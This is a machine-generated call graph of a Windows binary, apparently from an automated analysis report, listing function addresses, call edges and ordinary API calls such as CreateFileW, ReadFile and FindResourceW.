40290->40291 40292 40aa04 ??3@YAXPAX 40291->40292 40292->40262 40293->40265 40294->40267 40295->40269 40296->40274 40297->40280 40298->40270 40299->40278 40300->40281 40301->40271 40302->40276 40303->40285 40304->40287 40305->40245 40306->39492 40307->39500 37667 44dea5 37668 44deb5 FreeLibrary 37667->37668 37669 44dec3 37667->37669 37668->37669 40317 4148b6 FindResourceW 40318 4148cf SizeofResource 40317->40318 40321 4148f9 40317->40321 40319 4148e0 LoadResource 40318->40319 40318->40321 40320 4148ee LockResource 40319->40320 40319->40321 40320->40321 37843 415304 ??3@YAXPAX 40322 441b3f 40332 43a9f6 40322->40332 40324 441b61 40505 4386af memset 40324->40505 40326 44189a 40327 4418e2 40326->40327 40331 442bd4 40326->40331 40328 4418ea 40327->40328 40506 4414a9 12 API calls 40327->40506 40331->40328 40507 441409 memset 40331->40507 40333 43aa20 40332->40333 40334 43aadf 40332->40334 40333->40334 40335 43aa34 memset 40333->40335 40334->40324 40336 43aa56 40335->40336 40337 43aa4d 40335->40337 40508 43a6e7 40336->40508 40516 42c02e memset 40337->40516 40342 43aad3 40518 4169a7 11 API calls 40342->40518 40343 43aaae 40343->40334 40343->40342 40358 43aae5 40343->40358 40344 43ac18 40347 43ac47 40344->40347 40520 42bbd5 memcpy memcpy memcpy memset memcpy 40344->40520 40348 43aca8 40347->40348 40521 438eed 16 API calls 40347->40521 40352 43acd5 40348->40352 40523 4233ae 11 API calls 40348->40523 40351 43ac87 40522 4233c5 16 API calls 40351->40522 40524 423426 11 API calls 40352->40524 40356 43ace1 40525 439811 163 API calls 40356->40525 40357 43a9f6 161 API calls 40357->40358 40358->40334 40358->40344 40358->40357 40519 439bbb 22 API calls 40358->40519 40360 43acfd 40365 43ad2c 40360->40365 40526 438eed 16 API calls 40360->40526 40362 43ad19 40527 4233c5 16 API calls 40362->40527 40364 43ad58 40528 44081d 163 API calls 40364->40528 40365->40364 40368 43add9 40365->40368 40532 423426 11 API calls 40368->40532 40369 43ae3a memset 40370 43ae73 40369->40370 40533 42e1c0 147 API calls 40370->40533 40371 43adab 40530 438c4e 163 API calls 40371->40530 40372 43ad6c 40372->40334 40372->40371 40529 42370b memset memcpy memset 40372->40529 40376 43adcc 40531 440f84 12 API calls 40376->40531 40377 43ae96 40534 42e1c0 147 API calls 40377->40534 40380 43aea8 40381 43aec1 40380->40381 40535 42e199 147 API calls 40380->40535 40382 43af00 40381->40382 40536 42e1c0 147 API calls 40381->40536 40382->40334 40386 43af1a 40382->40386 40387 43b3d9 40382->40387 40537 438eed 16 API calls 40386->40537 40392 43b3f6 40387->40392 40396 43b4c8 40387->40396 40388 43b60f 40388->40334 40596 4393a5 17 API calls 40388->40596 40391 43af2f 40538 4233c5 16 API calls 40391->40538 40578 432878 12 API calls 40392->40578 40394 43af51 40539 423426 11 API calls 40394->40539 40402 43b4f2 40396->40402 40584 42bbd5 memcpy memcpy memcpy memset memcpy 40396->40584 40398 43af7d 40540 423426 11 API calls 40398->40540 40585 43a76c 21 API calls 40402->40585 40403 43b529 40586 44081d 163 API calls 40403->40586 40404 43b462 40580 423330 11 API calls 40404->40580 40405 43af94 40541 423330 11 API calls 40405->40541 40409 43afca 40542 423330 11 API calls 40409->40542 40410 43b47e 40414 43b497 40410->40414 40581 42374a memcpy memset memcpy memcpy memcpy 40410->40581 40411 43b544 40415 43b55c 40411->40415 40587 42c02e memset 40411->40587 40412 43b428 40412->40404 40579 432b60 16 API calls 40412->40579 40582 4233ae 11 API calls 40414->40582 40588 43a87a 163 API calls 40415->40588 40417 43afdb 40543 4233ae 11 API calls 40417->40543 40422 43b56c 40426 43b58a 40422->40426 40589 423330 11 API calls 40422->40589 40423 43b4b1 40583 423399 11 API calls 40423->40583 40425 43afee 40544 44081d 163 API calls 40425->40544 40590 440f84 12 API calls 40426->40590 40427 43b4c1 40592 42db80 163 API calls 40427->40592 40432 43b592 40591 43a82f 16 API calls 40432->40591 40435 43b5b4 40593 438c4e 163 API calls 40435->40593 40437 43b5cf 40594 42c02e memset 40437->40594 40439 43b005 40439->40334 40443 43b01f 40439->40443 40545 42d836 163 API calls 40439->40545 40440 43b1ef 40555 4233c5 16 API calls 40440->40555 40443->40440 40553 423330 11 API calls 40443->40553 40554 42d71d 163 API calls 40443->40554 40444 43b212 40556 423330 11 API calls 40444->40556 40446 43b087 40546 4233ae 11 API calls 40446->40546 40447 43add4 40447->40388 40595 438f86 16 API calls 40447->40595 40450 43b22a 40557 42ccb5 11 API calls 40450->40557 40453 43b23f 40558 4233ae 11 API calls 40453->40558 40454 43b10f 40549 423330 11 API calls 40454->40549 40456 43b257 40559 4233ae 11 API calls 40456->40559 40460 43b129 40550 4233ae 11 API calls 40460->40550 40461 43b26e 40560 4233ae 11 API calls 40461->40560 40464 43b09a 40464->40454 40547 42cc15 19 API calls 40464->40547 40548 4233ae 11 API calls 40464->40548 40465 43b282 40561 43a87a 163 API calls 40465->40561 40467 43b13c 40551 440f84 12 API calls 40467->40551 40469 43b29d 40562 423330 11 API calls 40469->40562 40472 43b15f 40552 4233ae 11 API calls 40472->40552 40473 43b2af 40474 43b2b8 40473->40474 40475 43b2ce 40473->40475 40563 4233ae 11 API calls 40474->40563 40564 440f84 12 API calls 40475->40564 40479 43b2c9 40566 4233ae 11 API calls 40479->40566 40480 43b2da 40565 42370b memset memcpy memset 40480->40565 40483 43b2f9 40567 423330 11 API calls 40483->40567 40485 43b30b 40568 423330 11 API calls 40485->40568 40487 43b325 40569 423399 11 API calls 40487->40569 40489 43b332 40570 4233ae 11 API calls 40489->40570 40491 43b354 40571 423399 11 API calls 40491->40571 40493 43b364 40572 43a82f 16 API calls 40493->40572 40495 43b370 40573 42db80 163 API calls 40495->40573 40497 43b380 40574 438c4e 163 API calls 40497->40574 40499 43b39e 40575 423399 11 API calls 40499->40575 40501 43b3ae 40576 43a76c 21 API calls 40501->40576 40503 43b3c3 40577 423399 11 API calls 40503->40577 40505->40326 40506->40328 40507->40331 40509 43a6f5 40508->40509 40510 43a765 40508->40510 40509->40510 40597 42a115 40509->40597 40510->40334 40517 4397fd memset 40510->40517 40514 43a73d 40514->40510 40515 42a115 147 API calls 40514->40515 40515->40510 40516->40336 40517->40343 40518->40334 40519->40358 40520->40347 40521->40351 40522->40348 40523->40352 40524->40356 40525->40360 40526->40362 40527->40365 40528->40372 40529->40371 40530->40376 40531->40447 40532->40369 40533->40377 40534->40380 40535->40381 40536->40381 40537->40391 40538->40394 40539->40398 40540->40405 40541->40409 40542->40417 40543->40425 40544->40439 40545->40446 40546->40464 40547->40464 40548->40464 40549->40460 40550->40467 40551->40472 40552->40443 40553->40443 40554->40443 40555->40444 40556->40450 40557->40453 40558->40456 40559->40461 40560->40465 40561->40469 40562->40473 40563->40479 40564->40480 40565->40479 40566->40483 40567->40485 40568->40487 40569->40489 40570->40491 40571->40493 40572->40495 40573->40497 40574->40499 40575->40501 40576->40503 40577->40447 40578->40412 40579->40404 40580->40410 40581->40414 40582->40423 40583->40427 40584->40402 40585->40403 40586->40411 40587->40415 40588->40422 40589->40426 40590->40432 40591->40427 40592->40435 40593->40437 40594->40447 40595->40388 40596->40334 40598 42a175 40597->40598 40600 42a122 40597->40600 40598->40510 40603 42b13b 147 API calls 40598->40603 40600->40598 40601 42a115 147 API calls 40600->40601 40604 43a174 40600->40604 40628 42a0a8 147 API calls 40600->40628 40601->40600 40603->40514 40618 43a196 40604->40618 40619 43a19e 40604->40619 40605 43a306 40605->40618 40641 4388c4 14 API calls 40605->40641 40608 42a115 147 API calls 40608->40619 40609 415a91 memset 40609->40619 40610 43a642 40610->40618 40645 4169a7 11 API calls 40610->40645 40612 4165ff 11 API calls 40612->40619 40614 43a635 40644 42c02e memset 40614->40644 40618->40600 40619->40605 40619->40608 40619->40609 40619->40612 40619->40618 40629 42ff8c 40619->40629 40637 439504 13 API calls 40619->40637 40638 4312d0 147 API calls 40619->40638 40639 42be4c memcpy memcpy memcpy memset memcpy 40619->40639 40640 43a121 11 API calls 40619->40640 40621 4169a7 11 API calls 40622 43a325 40621->40622 40622->40610 40622->40614 40622->40618 40622->40621 40623 42b5b5 memset memcpy 40622->40623 40624 42bf4c 14 API calls 40622->40624 40627 4165ff 11 API calls 40622->40627 40642 42b63e 14 API calls 40622->40642 40643 42bfcf memcpy 40622->40643 40623->40622 40624->40622 40627->40622 40628->40600 40630 43817e 139 API calls 40629->40630 40631 42ff99 40630->40631 40632 42ffe3 40631->40632 40633 42ffd0 40631->40633 40636 42ff9d 40631->40636 40647 4169a7 11 API calls 40632->40647 40646 4169a7 11 API calls 40633->40646 40636->40619 40637->40619 40638->40619 40639->40619 40640->40619 40641->40622 40642->40622 40643->40622 40644->40610 40645->40618 40646->40636 40647->40636 40669 41493c EnumResourceNamesW 37671 4287c1 37672 4287d2 37671->37672 37673 429ac1 37671->37673 37674 428818 37672->37674 37675 42881f 37672->37675 37690 425711 37672->37690 37685 425ad6 37673->37685 37741 415c56 11 API calls 37673->37741 37708 42013a 37674->37708 37736 420244 97 API calls 37675->37736 37680 4260dd 37735 424251 120 API calls 37680->37735 37682 4259da 37734 416760 11 API calls 37682->37734 37688 422aeb memset memcpy memcpy 37688->37690 37689 429a4d 37691 429a66 37689->37691 37695 429a9b 37689->37695 37690->37673 37690->37682 37690->37688 37690->37689 37693 4260a1 37690->37693 37704 4259c2 37690->37704 37707 425a38 37690->37707 37724 4227f0 memset memcpy 37690->37724 37725 422b84 15 API calls 37690->37725 37726 422b5d memset memcpy memcpy 37690->37726 37727 422640 13 API calls 37690->37727 37729 4241fc 11 API calls 37690->37729 37730 42413a 90 API calls 37690->37730 37737 415c56 11 API calls 37691->37737 37733 415c56 11 API calls 37693->37733 37696 429a96 37695->37696 37739 416760 11 API calls 37695->37739 37740 424251 120 API calls 37696->37740 37699 429a7a 37738 416760 11 API calls 37699->37738 37704->37685 37728 415c56 11 API calls 37704->37728 37707->37704 37731 422640 13 API calls 37707->37731 37732 4226e0 12 API calls 37707->37732 37709 42014c 37708->37709 37712 420151 37708->37712 37751 41e466 97 API calls 37709->37751 37711 420162 37711->37690 37712->37711 37713 4201b3 37712->37713 37714 420229 37712->37714 37715 4201b8 37713->37715 37716 4201dc 37713->37716 37714->37711 37717 41fd5e 86 API calls 37714->37717 37742 41fbdb 37715->37742 37716->37711 37720 4201ff 37716->37720 37748 41fc4c 37716->37748 37717->37711 37720->37711 37723 42013a 97 API calls 37720->37723 37723->37711 37724->37690 37725->37690 37726->37690 37727->37690 37728->37682 37729->37690 37730->37690 37731->37707 37732->37707 37733->37682 37734->37680 37735->37685 37736->37690 37737->37699 37738->37696 37739->37696 37740->37673 37741->37682 37743 41fbf1 37742->37743 37744 41fbf8 37742->37744 37747 41fc39 37743->37747 37766 4446ce 11 API calls 37743->37766 37756 41ee26 37744->37756 37747->37711 37752 41fd5e 37747->37752 37749 41ee6b 86 API calls 37748->37749 37750 41fc5d 37749->37750 37750->37716 37751->37712 37754 41fd65 37752->37754 37753 41fdab 37753->37711 37754->37753 37755 41fbdb 86 API calls 37754->37755 37755->37754 37757 41ee41 37756->37757 37758 41ee32 37756->37758 37767 41edad 37757->37767 37770 4446ce 11 API calls 37758->37770 37761 41ee3c 37761->37743 37764 41ee58 37764->37761 37772 41ee6b 37764->37772 37766->37747 37776 41be52 37767->37776 37770->37761 37771 41eb85 11 API calls 37771->37764 37773 41ee70 37772->37773 37774 41ee78 37772->37774 37829 41bf99 86 API calls 37773->37829 37774->37761 37777 41be6f 37776->37777 37778 41be5f 37776->37778 37784 41be8c 37777->37784 37808 418c63 memset memset 37777->37808 37807 4446ce 11 API calls 37778->37807 37781 41be69 37781->37761 37781->37771 37782 41bee7 37782->37781 37812 41a453 86 API calls 37782->37812 37784->37781 37784->37782 37785 41bf3a 37784->37785 37786 41bed1 37784->37786 37811 4446ce 11 API calls 37785->37811 37788 41bef0 37786->37788 37791 41bee2 37786->37791 37788->37782 37790 41bf01 37788->37790 37789 41bf24 memset 37789->37781 37790->37789 37792 41bf14 37790->37792 37809 418a6d memset memcpy memset 37790->37809 37797 41ac13 37791->37797 37810 41a223 memset memcpy memset 37792->37810 37796 41bf20 37796->37789 37798 41ac3f memset 37797->37798 37800 41ac52 37797->37800 37799 41acd9 37798->37799 37799->37782 37802 41ac6a 37800->37802 37813 41dc14 19 API calls 37800->37813 37804 41aca1 37802->37804 37814 41519d 37802->37814 37804->37799 37805 41acc0 memset 37804->37805 37806 41accd memcpy 37804->37806 37805->37799 37806->37799 37807->37781 37808->37784 37809->37792 37810->37796 37811->37782 37813->37802 37817 4175ed 37814->37817 37825 417570 SetFilePointer 37817->37825 37820 41760a ReadFile 37821 417637 37820->37821 37822 417627 GetLastError 37820->37822 37823 4151b3 37821->37823 37824 41763e memset 37821->37824 37822->37823 37823->37804 37824->37823 37826 4175b2 37825->37826 37827 41759c GetLastError 37825->37827 37826->37820 37826->37823 37827->37826 37828 4175a8 GetLastError 37827->37828 37828->37826 37829->37774 37830 417bc5 37831 417c61 37830->37831 37836 417bda 37830->37836 37832 417bf6 UnmapViewOfFile CloseHandle 37832->37832 37832->37836 37834 417c2c 37834->37836 37842 41851e 20 API calls 37834->37842 37836->37831 37836->37832 37836->37834 37837 4175b7 37836->37837 37838 4175d6 FindCloseChangeNotification 37837->37838 37839 4175c8 37838->37839 37840 4175df 37838->37840 37839->37840 37841 4175ce Sleep 37839->37841 37840->37836 37841->37838 37842->37834 37849 4415ea 37857 4304b2 37849->37857 37851 4415fe 37852 4418ea 37851->37852 37853 442bd4 37851->37853 37854 4418e2 37851->37854 37853->37852 37905 441409 memset 37853->37905 37854->37852 37904 4414a9 12 API calls 37854->37904 37906 43041c 12 API calls 37857->37906 37859 4304cd 37864 430557 37859->37864 37907 43034a memcpy 37859->37907 37861 4304f3 37861->37864 37908 430468 11 API calls 37861->37908 37863 430506 37863->37864 37865 43057b 37863->37865 37909 43817e 37863->37909 37864->37851 37914 415a91 37865->37914 37870 4305e4 37870->37864 37919 4328e4 12 API calls 37870->37919 37872 43052d 37872->37864 37872->37865 37875 430542 37872->37875 37874 4305fa 37876 430609 37874->37876 37920 423383 11 API calls 37874->37920 37875->37864 37913 4169a7 11 API calls 37875->37913 37921 423330 11 API calls 37876->37921 37879 430634 37922 423399 11 API calls 37879->37922 37881 430648 37923 4233ae 11 API calls 37881->37923 37883 43066b 37924 423330 11 API calls 37883->37924 37885 43067d 37925 4233ae 11 API calls 37885->37925 37887 430695 37926 423330 11 API calls 37887->37926 37889 4306d6 37928 423330 11 API calls 37889->37928 37890 4306a7 37890->37889 37892 4306c0 37890->37892 37927 4233ae 11 API calls 37892->37927 37893 4306d1 37929 430369 17 API calls 37893->37929 37896 4306f3 37930 423330 11 API calls 37896->37930 37898 430704 37931 423330 11 API calls 37898->37931 37900 430710 37932 423330 11 API calls 37900->37932 37902 43071e 37933 423383 11 API calls 37902->37933 37904->37852 37905->37853 37906->37859 37907->37861 37908->37863 37910 438187 37909->37910 37912 438192 37909->37912 37934 4380f6 37910->37934 37912->37872 37913->37864 37915 415a9d 37914->37915 37916 415ab3 37915->37916 37917 415aa4 memset 37915->37917 37916->37864 37918 4397fd memset 37916->37918 37917->37916 37918->37870 37919->37874 37920->37876 37921->37879 37922->37881 37923->37883 37924->37885 37925->37887 37926->37890 37927->37893 37928->37893 37929->37896 37930->37898 37931->37900 37932->37902 37933->37864 37936 43811f 37934->37936 37935 438164 37935->37912 37936->37935 37939 437e5e 37936->37939 37962 4300e8 37936->37962 37970 437d3c 37939->37970 37941 437eb3 37941->37936 37942 437ea9 37942->37941 37947 437f22 37942->37947 37985 41f432 37942->37985 37945 437f06 38035 415c56 11 API calls 37945->38035 37949 437f7f 37947->37949 38036 432d4e 37947->38036 37948 437f95 38040 415c56 11 API calls 37948->38040 37949->37948 37951 43802b 37949->37951 37996 4165ff 37951->37996 37957 43806b 37958 438094 37957->37958 38041 42f50e 138 API calls 37957->38041 37960 437fa3 37958->37960 37961 4300e8 3 API calls 37958->37961 37960->37941 38042 41f638 104 API calls 37960->38042 37961->37960 37963 430128 37962->37963 37966 4300fa 37962->37966 37965 430196 memset 37963->37965 37967 4301bc 37965->37967 37969 4301de 37965->37969 37966->37963 37966->37969 38449 432f8c 37966->38449 37968 4301c9 memcpy 37967->37968 37967->37969 37968->37969 37969->37936 37971 437d69 37970->37971 37974 437d80 37970->37974 38055 437ccb 11 API calls 37971->38055 37973 437d76 37973->37942 37974->37973 37975 437da3 37974->37975 37977 437d90 37974->37977 38043 438460 37975->38043 37977->37973 38059 437ccb 11 API calls 37977->38059 37979 437de8 38058 424f26 123 API calls 37979->38058 37981 437dcb 37981->37979 38056 444283 13 API calls 37981->38056 37983 437dfc 38057 437ccb 11 API calls 37983->38057 37986 41f54d 37985->37986 37992 41f44f 37985->37992 37987 41f466 37986->37987 38253 41c635 memset memset 37986->38253 37987->37945 37987->37947 37992->37987 37994 41f50b 37992->37994 38224 41f1a5 37992->38224 38249 41c06f memcmp 37992->38249 38250 41f3b1 90 API calls 37992->38250 38251 41f398 86 API calls 37992->38251 37994->37986 37994->37987 38252 41c295 86 API calls 37994->38252 37997 4165a0 11 API calls 37996->37997 37998 41660d 37997->37998 37999 437371 37998->37999 38000 41703f 11 API calls 37999->38000 38001 437399 38000->38001 38002 43739d 38001->38002 38004 4373ac 38001->38004 38358 4446ea 11 API calls 38002->38358 38005 416935 16 API calls 38004->38005 38006 4373ca 38005->38006 38007 438460 134 API calls 38006->38007 38016 415a91 memset 38006->38016 38019 43758f 38006->38019 38031 437584 38006->38031 38034 437d3c 135 API calls 38006->38034 38340 4251c4 38006->38340 38359 425433 13 API calls 38006->38359 38360 425413 17 API calls 38006->38360 38361 42533e 16 API calls 38006->38361 38362 42538f 16 API calls 38006->38362 38363 42453e 123 API calls 38006->38363 38007->38006 38008 4375bc 38010 415c7d 16 API calls 38008->38010 38011 4375d2 38010->38011 38033 4373a7 38011->38033 38366 4442e6 38011->38366 38014 4375e2 38014->38033 38373 444283 13 API calls 38014->38373 38016->38006 38364 42453e 123 API calls 38019->38364 38022 4375f4 38025 437620 38022->38025 38026 43760b 38022->38026 38024 43759f 38027 416935 16 API calls 38024->38027 38029 416935 16 API calls 38025->38029 38374 444283 13 API calls 38026->38374 38027->38031 38029->38033 38031->38008 38365 42453e 123 API calls 38031->38365 38032 437612 memcpy 38032->38033 38033->37957 38034->38006 38035->37941 38037 432d65 38036->38037 38038 432d58 38036->38038 38037->37949 38448 432cc4 memset memset memcpy 38038->38448 38040->37960 38041->37958 38042->37941 38060 41703f 38043->38060 38045 43847a 38046 43848a 38045->38046 38047 43847e 38045->38047 38067 438270 38046->38067 38097 4446ea 11 API calls 38047->38097 38051 438488 38051->37981 38053 4384bb 38054 438270 134 API calls 38053->38054 38054->38051 38055->37973 38056->37983 38057->37979 38058->37973 38059->37973 38061 417044 38060->38061 38062 41705c 38060->38062 38066 417055 38061->38066 38099 416760 11 API calls 38061->38099 38063 417075 38062->38063 38100 41707a 38062->38100 38063->38045 38066->38045 38068 415a91 memset 38067->38068 38069 43828d 38068->38069 38070 438297 38069->38070 38071 438341 38069->38071 38073 4382d6 38069->38073 38072 415c7d 16 API calls 38070->38072 38106 44358f 38071->38106 38075 438458 38072->38075 38076 4382fb 38073->38076 38077 4382db 38073->38077 38075->38051 38098 424f26 123 API calls 38075->38098 38149 415c23 memcpy 38076->38149 38137 416935 38077->38137 38080 438305 38084 44358f 19 API calls 38080->38084 38086 438318 38080->38086 38081 4382e9 38145 415c7d 38081->38145 38083 438373 38087 4300e8 3 API calls 38083->38087 38089 438383 38083->38089 38084->38086 38086->38083 38132 43819e 38086->38132 38087->38089 38088 4383cd 38090 4383f5 38088->38090 38151 42453e 123 API calls 38088->38151 38089->38088 38150 415c23 memcpy 38089->38150 38093 438404 38090->38093 38094 43841c 38090->38094 38096 416935 16 API calls 38093->38096 38095 416935 16 API calls 38094->38095 38095->38070 38096->38070 38097->38051 38098->38053 38099->38066 38101 417085 38100->38101 38102 4170ab 38100->38102 38101->38102 38105 416760 11 API calls 38101->38105 38102->38061 38104 4170a4 38104->38061 38105->38104 38107 4435be 38106->38107 38109 443676 38107->38109 38113 4436ce 38107->38113 38116 44366c 38107->38116 38130 44360c 38107->38130 38152 442ff8 38107->38152 38108 443758 38121 443775 38108->38121 38161 441409 memset 38108->38161 38109->38108 38112 442ff8 19 API calls 38109->38112 38115 443737 38109->38115 38111 442ff8 19 API calls 38111->38108 38112->38115 38118 4165ff 11 API calls 38113->38118 38115->38111 38160 4169a7 11 API calls 38116->38160 38117 4437be 38122 4437de 38117->38122 38163 416760 11 API calls 38117->38163 38118->38109 38121->38117 38162 415c56 11 API calls 38121->38162 38124 443801 38122->38124 38164 42463b memset memcpy 38122->38164 38123 443826 38175 43bd08 memset 38123->38175 38124->38123 38165 43024d 38124->38165 38129 443837 38129->38130 38131 43024d memset 38129->38131 38130->38086 38131->38129 38133 438246 38132->38133 38135 4381ba 38132->38135 38133->38083 38134 41f432 110 API calls 38134->38135 38135->38133 38135->38134 38202 41f638 104 API calls 38135->38202 38138 41693e 38137->38138 38144 41698e 38137->38144 38139 41694c 38138->38139 38203 422fd1 memset 38138->38203 38139->38144 38204 4165a0 38139->38204 38144->38081 38146 415c81 38145->38146 38148 415c9c 38145->38148 38147 416935 16 API calls 38146->38147 38146->38148 38147->38148 38148->38070 38149->38080 38150->38088 38151->38090 38158 442ffe 38152->38158 38153 443094 38190 4414a9 12 API calls 38153->38190 38155 443092 38155->38107 38158->38153 38158->38155 38176 4414ff 38158->38176 38188 4169a7 11 API calls 38158->38188 38189 441325 memset 38158->38189 38160->38109 38161->38108 38162->38117 38163->38122 38164->38124 38166 4302f9 38165->38166 38171 43025c 38165->38171 38166->38123 38167 4302cd 38191 435ef3 38167->38191 38171->38166 38171->38167 38200 4172c8 memset 38171->38200 38173 4302dc 38201 4386af memset 38173->38201 38175->38129 38177 441539 38176->38177 38179 441547 38176->38179 38178 441575 38177->38178 38177->38179 38180 441582 38177->38180 38182 42fccf 18 API calls 38178->38182 38181 4418e2 38179->38181 38185 442bd4 38179->38185 38183 43275a 12 API calls 38180->38183 38184 4414a9 12 API calls 38181->38184 38186 4418ea 38181->38186 38182->38179 38183->38179 38184->38186 38185->38186 38187 441409 memset 38185->38187 38186->38158 38187->38185 38188->38158 38189->38158 38190->38155 38192 4302d4 38191->38192 38194 435f03 38191->38194 38196 4301e7 38192->38196 38193 435533 memset 38193->38194 38194->38192 38194->38193 38195 4172c8 memset 38194->38195 38195->38194 38197 43023c 38196->38197 38199 4301f5 38196->38199 38197->38173 38198 42b896 memset 38198->38199 38199->38197 38199->38198 38200->38171 38201->38166 38202->38135 38203->38139 38210 415cfe 38204->38210 38209 422b84 15 API calls 38209->38144 38214 415d23 38210->38214 38217 41628e 38210->38217 38211 4163ca 38212 416422 10 API calls 38211->38212 38212->38217 38213 416172 memset 38213->38214 38214->38211 38214->38213 38215 416422 10 API calls 38214->38215 38216 415cb9 10 API calls 38214->38216 38214->38217 38215->38214 38216->38214 38218 416520 38217->38218 38219 416527 38218->38219 38223 416574 38218->38223 38220 416544 38219->38220 38221 415700 10 API calls 38219->38221 38219->38223 38222 416561 memcpy 38220->38222 38220->38223 38221->38220 38222->38223 38223->38144 38223->38209 38254 41bc3b 38224->38254 38227 41edad 86 API calls 38228 41f1cb 38227->38228 38229 41f1f5 memcmp 38228->38229 38230 41f20e 38228->38230 38234 41f282 38228->38234 38229->38230 38231 41f21b memcmp 38230->38231 38230->38234 38232 41f326 38231->38232 38235 41f23d 38231->38235 38233 41ee6b 86 API calls 38232->38233 38232->38234 38233->38234 38234->37992 38235->38232 38236 41f28e memcmp 38235->38236 38278 41c8df 56 API calls 38235->38278 38236->38232 38237 41f2a9 38236->38237 38237->38232 38240 41f308 38237->38240 38241 41f2d8 38237->38241 38239 41f269 38239->38232 38242 41f287 38239->38242 38243 41f27a 38239->38243 38240->38232 38280 4446ce 11 API calls 38240->38280 38244 41ee6b 86 API calls 38241->38244 38242->38236 38245 41ee6b 86 API calls 38243->38245 38246 41f2e0 38244->38246 38245->38234 38279 41b1ca memset 38246->38279 38249->37992 38250->37992 38251->37992 38252->37986 38253->37987 38257 41bc54 38254->38257 38263 41be0b 38254->38263 38256 41bd61 38259 41be45 38256->38259 38290 41a25f memset 38256->38290 38257->38256 38257->38263 38267 41bc8d 38257->38267 38281 41baf0 55 API calls 38257->38281 38259->38227 38259->38234 38261 41be04 38288 41aee4 56 API calls 38261->38288 38263->38256 38289 41ae17 34 API calls 38263->38289 38264 41bd42 38264->38256 38264->38261 38265 41bdd8 memset 38264->38265 38266 41bdba 38264->38266 38268 41bde7 memcmp 38265->38268 38277 4175ed 6 API calls 38266->38277 38267->38256 38267->38264 38269 41bd18 38267->38269 38282 4151e3 38267->38282 38268->38261 38271 41bdfd 38268->38271 38269->38256 38269->38264 38286 41a9da 86 API calls 38269->38286 38270 41bdcc 38270->38256 38270->38268 38287 41a1b0 memset 38271->38287 38277->38270 38278->38239 38279->38234 38280->38232 38281->38267 38291 41837f 38282->38291 38285 444706 11 API calls 38285->38269 38286->38264 38287->38261 38288->38263 38289->38256 38290->38259 38292 4183c1 38291->38292 38293 4183ca 38291->38293 38338 418197 25 API calls 38292->38338 38296 4151f9 38293->38296 38312 418160 38293->38312 38296->38269 38296->38285 38297 4183e5 38297->38296 38321 41739b 38297->38321 38300 418444 CreateFileW 38302 418477 38300->38302 38301 41845f CreateFileA 38301->38302 38303 4184c2 memset 38302->38303 38304 41847e GetLastError ??3@YAXPAX 38302->38304 38324 418758 38303->38324 38305 4184b5 38304->38305 38306 418497 38304->38306 38339 444706 11 API calls 38305->38339 38308 41837f 49 API calls 38306->38308 38308->38296 38313 41739b GetVersionExW 38312->38313 38314 418165 38313->38314 38316 4173e4 MultiByteToWideChar malloc MultiByteToWideChar ??3@YAXPAX 38314->38316 38317 418178 38316->38317 38318 41817f 38317->38318 38319 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte ??3@YAXPAX 38317->38319 38318->38297 38320 418188 ??3@YAXPAX 38319->38320 38320->38297 38322 4173d6 38321->38322 38323 4173ad GetVersionExW 38321->38323 38322->38300 38322->38301 38323->38322 38325 418680 43 API calls 38324->38325 38326 418782 38325->38326 38327 418506 ??3@YAXPAX 38326->38327 38328 418160 11 API calls 38326->38328 38327->38296 38329 418799 38328->38329 38329->38327 38330 41739b GetVersionExW 38329->38330 38331 4187a7 38330->38331 38332 4187da 38331->38332 38333 4187ad GetDiskFreeSpaceW 38331->38333 38335 4187ec GetDiskFreeSpaceA 38332->38335 38337 4187e8 38332->38337 38336 418800 ??3@YAXPAX 38333->38336 38335->38336 38336->38327 38337->38335 38338->38293 38339->38296 38375 424f07 38340->38375 38342 4251e4 38343 4251f7 38342->38343 38344 4251e8 38342->38344 38383 4250f8 38343->38383 38382 4446ea 11 API calls 38344->38382 38346 4251f2 38346->38006 38348 425209 38351 425249 38348->38351 38354 4250f8 127 API calls 38348->38354 38355 425287 38348->38355 38391 4384e9 135 API calls 38348->38391 38392 424f74 124 API calls 38348->38392 38349 415c7d 16 API calls 38349->38346 38351->38355 38393 424ff0 13 API calls 38351->38393 38354->38348 38355->38349 38356 425266 38356->38355 38394 415be9 memcpy 38356->38394 38358->38033 38359->38006 38360->38006 38361->38006 38362->38006 38363->38006 38364->38024 38365->38008 38367 4442eb 38366->38367 38370 444303 38366->38370 38368 41707a 11 API calls 38367->38368 38369 4442f2 38368->38369 38369->38370 38447 4446ea 11 API calls 38369->38447 38370->38014 38372 444300 38372->38014 38373->38022 38374->38032 38376 424f1f 38375->38376 38377 424f0c 38375->38377 38396 424eea 11 API calls 38376->38396 38395 416760 11 API calls 38377->38395 38380 424f18 38380->38342 38381 424f24 38381->38342 38382->38346 38384 425108 38383->38384 38390 42510d 38383->38390 38429 424f74 124 API calls 38384->38429 38387 42516e 38389 415c7d 16 API calls 38387->38389 38388 425115 38388->38348 38389->38388 38390->38388 38397 42569b 38390->38397 38391->38348 38392->38348 38393->38356 38394->38355 38395->38380 38396->38381 38398 4256f1 38397->38398 38425 4259c2 38397->38425 38404 4259da 38398->38404 38408 422aeb memset memcpy memcpy 38398->38408 38409 429a4d 38398->38409 38413 4260a1 38398->38413 38423 429ac1 38398->38423 38398->38425 38428 425a38 38398->38428 38430 4227f0 memset memcpy 38398->38430 38431 422b84 15 API calls 38398->38431 38432 422b5d memset memcpy memcpy 38398->38432 38433 422640 13 API calls 38398->38433 38435 4241fc 11 API calls 38398->38435 38436 42413a 90 API calls 38398->38436 38403 4260dd 38441 424251 120 API calls 38403->38441 38440 416760 11 API calls 38404->38440 38408->38398 38410 429a66 38409->38410 38411 429a9b 38409->38411 38442 415c56 11 API calls 38410->38442 38415 429a96 38411->38415 38444 416760 11 API calls 38411->38444 38439 415c56 11 API calls 38413->38439 38445 424251 120 API calls 38415->38445 38418 429a7a 38443 416760 11 API calls 38418->38443 38424 425ad6 38423->38424 38446 415c56 11 API calls 38423->38446 38424->38387 38425->38424 38434 415c56 11 API calls 38425->38434 38428->38425 38437 422640 13 API calls 38428->38437 38438 4226e0 12 API calls 38428->38438 38429->38390 38430->38398 38431->38398 38432->38398 38433->38398 38434->38404 38435->38398 38436->38398 38437->38428 38438->38428 38439->38404 38440->38403 38441->38424 38442->38418 38443->38415 38444->38415 38445->38423 38446->38404 38447->38372 38448->38037 38451 432fc6 38449->38451 38452 432fdd 38451->38452 38455 43bd08 memset 38451->38455 38453 43024d memset 38452->38453 38454 43300e 38452->38454 38453->38452 38454->37966 38455->38451 40308 4147f3 40311 414561 40308->40311 40310 414813 40312 41456d 40311->40312 40313 41457f 